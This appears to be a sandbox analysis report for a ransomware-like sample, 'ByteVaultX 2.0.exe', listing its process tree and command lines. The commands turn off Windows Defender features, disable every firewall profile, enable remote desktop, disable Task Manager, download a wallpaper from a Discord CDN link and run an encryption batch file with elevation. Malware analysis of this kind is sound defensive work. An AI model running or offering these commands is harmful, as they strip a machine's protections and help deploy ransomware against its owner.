PID 2928 wrote to memory of 2408 | N/A | C:\Users\Admin\AppData\Local\Temp\ByteVaultX 2.0.exe | C:\Users\Admin\AppData\Local\Temp\ByteVaultX 2.0.exe
PID 2928 wrote to memory of 2408 | N/A | C:\Users\Admin\AppData\Local\Temp\ByteVaultX 2.0.exe | C:\Users\Admin\AppData\Local\Temp\ByteVaultX 2.0.exe
PID 2408 wrote to memory of 1680 | N/A | C:\Users\Admin\AppData\Local\Temp\ByteVaultX 2.0.exe | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 2408 wrote to memory of 1680 | N/A | C:\Users\Admin\AppData\Local\Temp\ByteVaultX 2.0.exe | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 2408 wrote to memory of 5572 | N/A | C:\Users\Admin\AppData\Local\Temp\ByteVaultX 2.0.exe | C:\Windows\SYSTEM32\netsh.exe
PID 2408 wrote to memory of 5572 | N/A | C:\Users\Admin\AppData\Local\Temp\ByteVaultX 2.0.exe | C:\Windows\SYSTEM32\netsh.exe
PID 2408 wrote to memory of 1596 | N/A | C:\Users\Admin\AppData\Local\Temp\ByteVaultX 2.0.exe | C:\Windows\SYSTEM32\runas.exe
PID 2408 wrote to memory of 1596 | N/A | C:\Users\Admin\AppData\Local\Temp\ByteVaultX 2.0.exe | C:\Windows\SYSTEM32\runas.exe
PID 2408 wrote to memory of 4068 | N/A | C:\Users\Admin\AppData\Local\Temp\ByteVaultX 2.0.exe | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 2408 wrote to memory of 4068 | N/A | C:\Users\Admin\AppData\Local\Temp\ByteVaultX 2.0.exe | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 4068 wrote to memory of 6112 | N/A | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 4068 wrote to memory of 6112 | N/A | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 2408 wrote to memory of 5456 | N/A | C:\Users\Admin\AppData\Local\Temp\ByteVaultX 2.0.exe | C:\Windows\system32\cmd.exe
PID 2408 wrote to memory of 5456 | N/A | C:\Users\Admin\AppData\Local\Temp\ByteVaultX 2.0.exe | C:\Windows\system32\cmd.exe
PID 5456 wrote to memory of 4380 | N/A | C:\Windows\system32\cmd.exe | C:\Windows\system32\reg.exe
PID 5456 wrote to memory of 4380 | N/A | C:\Windows\system32\cmd.exe | C:\Windows\system32\reg.exe
PID 4068 wrote to memory of 3096 | N/A | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 4068 wrote to memory of 3096 | N/A | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 4068 wrote to memory of 3096 | N/A | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 4068 wrote to memory of 3096 | N/A | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 4068 wrote to memory of 3096 | N/A | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 4068 wrote to memory of 3096 | N/A | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 4068 wrote to memory of 3096 | N/A | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 4068 wrote to memory of 3096 | N/A | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 4068 wrote to memory of 3096 | N/A | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 4068 wrote to memory of 3096 | N/A | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 4068 wrote to memory of 3096 | N/A | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 4068 wrote to memory of 3096 | N/A | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 4068 wrote to memory of 3096 | N/A | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 4068 wrote to memory of 3096 | N/A | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 4068 wrote to memory of 3096 | N/A | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 4068 wrote to memory of 3096 | N/A | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 4068 wrote to memory of 3096 | N/A | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 4068 wrote to memory of 3096 | N/A | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 4068 wrote to memory of 3096 | N/A | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 4068 wrote to memory of 3096 | N/A | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 4068 wrote to memory of 3096 | N/A | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 4068 wrote to memory of 3096 | N/A | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 4068 wrote to memory of 3096 | N/A | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 4068 wrote to memory of 3096 | N/A | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 4068 wrote to memory of 3096 | N/A | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 4068 wrote to memory of 3096 | N/A | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 4068 wrote to memory of 3096 | N/A | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 4068 wrote to memory of 3096 | N/A | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 4068 wrote to memory of 3096 | N/A | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 4068 wrote to memory of 3096 | N/A | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 4068 wrote to memory of 3096 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 4068 wrote to memory of 3096 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 4068 wrote to memory of 3096 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 4068 wrote to memory of 3096 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 4068 wrote to memory of 3096 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 4068 wrote to memory of 3096 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 4068 wrote to memory of 3096 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 4068 wrote to memory of 3096 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 4068 wrote to memory of 3096 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 4068 wrote to memory of 3096 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 4068 wrote to memory of 4416 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 4068 wrote to memory of 4416 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 4068 wrote to memory of 2384 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 4068 wrote to memory of 2384 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 4068 wrote to memory of 2384 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 4068 wrote to memory of 2384 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 4068 wrote to memory of 2384 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 4068 wrote to memory of 2384 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

Processes

C:\Users\Admin\AppData\Local\Temp\ByteVaultX 2.0.exe

"C:\Users\Admin\AppData\Local\Temp\ByteVaultX 2.0.exe"

C:\Users\Admin\AppData\Local\Temp\ByteVaultX 2.0.exe

"C:\Users\Admin\AppData\Local\Temp\ByteVaultX 2.0.exe"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableRealtimeMonitoring $true"

C:\Windows\SYSTEM32\netsh.exe

netsh advfirewall set allprofiles state off

C:\Windows\SYSTEM32\runas.exe

runas /user:NT-AUTORITÄT\SYSTEM cmd.exe /c "C:\Encrypt\encrypt.bat"

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument C:\Encrypt\encrypt.html

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0xf8,0xfc,0x100,0xd4,0x104,0x7ffa121846f8,0x7ffa12184708,0x7ffa12184718

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c ""C:\Encrypt\encrypt.bat" "

C:\Windows\system32\reg.exe

reg query "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server" /v "fDenyTSConnections"

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2148,5292310798493132192,16021345772022231361,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2152 /prefetch:2

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2148,5292310798493132192,16021345772022231361,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2204 /prefetch:3

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=2148,5292310798493132192,16021345772022231361,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2868 /prefetch:8

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2148,5292310798493132192,16021345772022231361,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3292 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2148,5292310798493132192,16021345772022231361,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3296 /prefetch:1

C:\Windows\System32\CompPkgSrv.exe

C:\Windows\System32\CompPkgSrv.exe -Embedding

C:\Windows\System32\CompPkgSrv.exe

C:\Windows\System32\CompPkgSrv.exe -Embedding

C:\Windows\system32\reg.exe

reg add "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server" /v "fDenyTSConnections" /t REG_DWORD /d "0" /f

C:\Windows\system32\reg.exe

reg query "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableTaskMgr"

C:\Windows\system32\reg.exe

reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableTaskMgr" /t REG_DWORD /d "1" /f

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableIntrusionPreventionSystem $true"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableIOAVProtection $true"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableScriptScanning $true"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableEmailProtection $true"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableControlledFolderAccess $true"

C:\Windows\system32\netsh.exe

netsh firewall set opmode disable

C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2148,5292310798493132192,16021345772022231361,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5208 /prefetch:8

C:\Windows\system32\netsh.exe

netsh firewall set opmode mode=DISABLE

C:\Windows\system32\netsh.exe

netsh advfirewall set currentprofile state off

C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2148,5292310798493132192,16021345772022231361,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5208 /prefetch:8

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2148,5292310798493132192,16021345772022231361,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4756 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2148,5292310798493132192,16021345772022231361,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=9 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4736 /prefetch:1

C:\Windows\system32\netsh.exe

netsh advfirewall set domainprofile state off

C:\Windows\system32\netsh.exe

netsh advfirewall set privateprofile state off

C:\Windows\system32\netsh.exe

netsh advfirewall set publicprofile state off

C:\Windows\system32\netsh.exe

netsh advfirewall set allprofiles state off

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2148,5292310798493132192,16021345772022231361,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=10 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5036 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2148,5292310798493132192,16021345772022231361,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=11 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5292 /prefetch:1

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableRealtimeMonitoring $true"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableIntrusionPreventionSystem $true"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableIOAVProtection $true"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableScriptScanning $true"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableEmailProtection $true"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableControlledFolderAccess $true"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "(New-Object System.Net.WebClient).DownloadFile('https://cdn.discordapp.com/attachments/1181543227728330774/1244072427731025991/skulls-light-halloween-red_1.jpg?ex=6653c83c&is=665276bc&hm=31de2cb652ccec56aca0b6ecf1e9b33fd01f18e5d5d2690e68e000f0c1477ee6&', 'C:\Users\Admin\Desktop\kill.jpg')"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Start-Process 'C:\encrypt\encrypt.bat' -Verb RunAs"

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /C "C:\encrypt\encrypt.bat"

C:\Windows\system32\reg.exe

reg add "HKCU\Control Panel\Desktop" /v Wallpaper /t REG_SZ /d ""C:\Users\Admin\Desktop\kill.jpg"" /f

C:\Windows\system32\rundll32.exe

RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters

C:\Windows\system32\reg.exe

reg query "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server" /v "fDenyTSConnections"

C:\Windows\system32\reg.exe

reg add "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server" /v "fDenyTSConnections" /t REG_DWORD /d "0" /f

C:\Windows\system32\reg.exe

reg query "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableTaskMgr"

C:\Windows\system32\reg.exe

reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableTaskMgr" /t REG_DWORD /d "1" /f

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableIntrusionPreventionSystem $true"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableIOAVProtection $true"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableScriptScanning $true"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableEmailProtection $true"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableControlledFolderAccess $true"

C:\Windows\system32\netsh.exe

netsh firewall set opmode disable

C:\Windows\system32\netsh.exe

netsh firewall set opmode mode=DISABLE

C:\Windows\system32\netsh.exe

netsh advfirewall set currentprofile state off

C:\Windows\system32\netsh.exe

netsh advfirewall set domainprofile state off

C:\Windows\system32\netsh.exe

netsh advfirewall set privateprofile state off

C:\Windows\system32\netsh.exe

netsh advfirewall set publicprofile state off

C:\Windows\system32\netsh.exe

netsh advfirewall set allprofiles state off

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableRealtimeMonitoring $true"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableIntrusionPreventionSystem $true"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableIOAVProtection $true"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableScriptScanning $true"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableEmailProtection $true"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableControlledFolderAccess $true"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "(New-Object System.Net.WebClient).DownloadFile('https://cdn.discordapp.com/attachments/1181543227728330774/1244072427731025991/skulls-light-halloween-red_1.jpg?ex=6653c83c&is=665276bc&hm=31de2cb652ccec56aca0b6ecf1e9b33fd01f18e5d5d2690e68e000f0c1477ee6&', 'C:\Users\Admin\Desktop\kill.jpg')"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Start-Process 'C:\encrypt\encrypt.bat' -Verb RunAs"

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /C "C:\encrypt\encrypt.bat"

C:\Windows\system32\reg.exe

reg add "HKCU\Control Panel\Desktop" /v Wallpaper /t REG_SZ /d ""C:\Users\Admin\Desktop\kill.jpg"" /f

C:\Windows\system32\rundll32.exe

RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters

C:\Windows\system32\reg.exe

reg query "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server" /v "fDenyTSConnections"

C:\Windows\system32\reg.exe

reg add "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server" /v "fDenyTSConnections" /t REG_DWORD /d "0" /f

C:\Windows\system32\reg.exe

reg query "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableTaskMgr"

C:\Windows\system32\reg.exe

reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableTaskMgr" /t REG_DWORD /d "1" /f

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableIntrusionPreventionSystem $true"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableIOAVProtection $true"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableScriptScanning $true"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableEmailProtection $true"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableControlledFolderAccess $true"

C:\Windows\system32\netsh.exe

netsh firewall set opmode disable

C:\Windows\system32\netsh.exe

netsh firewall set opmode mode=DISABLE

C:\Windows\system32\netsh.exe

netsh advfirewall set currentprofile state off

C:\Windows\system32\netsh.exe

netsh advfirewall set domainprofile state off

C:\Windows\system32\netsh.exe

netsh advfirewall set privateprofile state off

C:\Windows\system32\netsh.exe

netsh advfirewall set publicprofile state off

C:\Windows\system32\netsh.exe

netsh advfirewall set allprofiles state off

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableRealtimeMonitoring $true"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableIntrusionPreventionSystem $true"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableIOAVProtection $true"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableScriptScanning $true"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableEmailProtection $true"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableControlledFolderAccess $true"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "(New-Object System.Net.WebClient).DownloadFile('https://cdn.discordapp.com/attachments/1181543227728330774/1244072427731025991/skulls-light-halloween-red_1.jpg?ex=6653c83c&is=665276bc&hm=31de2cb652ccec56aca0b6ecf1e9b33fd01f18e5d5d2690e68e000f0c1477ee6&', 'C:\Users\Admin\Desktop\kill.jpg')"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Start-Process 'C:\encrypt\encrypt.bat' -Verb RunAs"

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /C "C:\encrypt\encrypt.bat"

C:\Windows\system32\reg.exe

reg add "HKCU\Control Panel\Desktop" /v Wallpaper /t REG_SZ /d ""C:\Users\Admin\Desktop\kill.jpg"" /f

C:\Windows\system32\rundll32.exe

RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters

C:\Windows\system32\reg.exe

reg query "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server" /v "fDenyTSConnections"

C:\Windows\system32\reg.exe

reg add "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server" /v "fDenyTSConnections" /t REG_DWORD /d "0" /f

C:\Windows\system32\reg.exe

reg query "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableTaskMgr"

C:\Windows\system32\reg.exe

reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableTaskMgr" /t REG_DWORD /d "1" /f

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableIntrusionPreventionSystem $true"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableIOAVProtection $true"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableScriptScanning $true"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableEmailProtection $true"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableControlledFolderAccess $true"

C:\Windows\system32\netsh.exe

netsh firewall set opmode disable

C:\Windows\system32\netsh.exe

netsh firewall set opmode mode=DISABLE

C:\Windows\system32\netsh.exe

netsh advfirewall set currentprofile state off

C:\Windows\system32\netsh.exe

netsh advfirewall set domainprofile state off

C:\Windows\system32\netsh.exe

netsh advfirewall set privateprofile state off

C:\Windows\system32\netsh.exe

netsh advfirewall set publicprofile state off

C:\Windows\system32\netsh.exe

netsh advfirewall set allprofiles state off

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableRealtimeMonitoring $true"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableIntrusionPreventionSystem $true"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableIOAVProtection $true"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableScriptScanning $true"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableEmailProtection $true"

